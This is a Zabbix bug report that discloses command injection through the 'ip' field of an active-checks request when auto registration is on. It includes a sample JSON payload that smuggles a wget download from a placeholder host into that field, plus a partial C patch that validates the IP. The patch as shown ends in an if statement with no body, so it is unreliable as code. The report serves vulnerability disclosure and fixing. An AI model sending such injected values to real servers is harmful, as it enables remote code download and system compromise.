-
Change Request
-
Resolution: Duplicate
-
Blocker
-
None
-
2.2.18, 3.0.9
-
None
I confirmed that you fixed on 3.0.9, 2.2.18 for ZBX-12075 and etc., but it is not enough because you do not care at the situation for active check with auto registration.
I send following command to Zabbix trapper.
{ "request":"active checks", "host":"foobar", "ip":";wget -O /tmp/s http://www.xxx.yyy.zzz/s;#" }If Zabbix server allows auto registration, a host is registred. So, with default scripts command injection is possible.
For fixing upper, I attached the patch not to accept incorrect ip at the auto regstration on active checks.
— src/zabbix_server/trapper/active.c 2017-02-27 18:22:48.000000000 +0900
+++ src/zabbix_server/trapper/active.c.new 2017-05-30 11:15:19.623254495 +0900
@@ -56,6 +56,12 @@ static int get_hostid_by_host(const char
zabbix_log(LOG_LEVEL_DEBUG, "In %s() host:'%s'", __function_name, host);
+ if (FAIL == is_ip(ip))
+
+
if (FAIL == zbx_check_hostname(host))
{
zbx_snprintf(error, MAX_STRING_LEN, "invalid host name [%s]", host);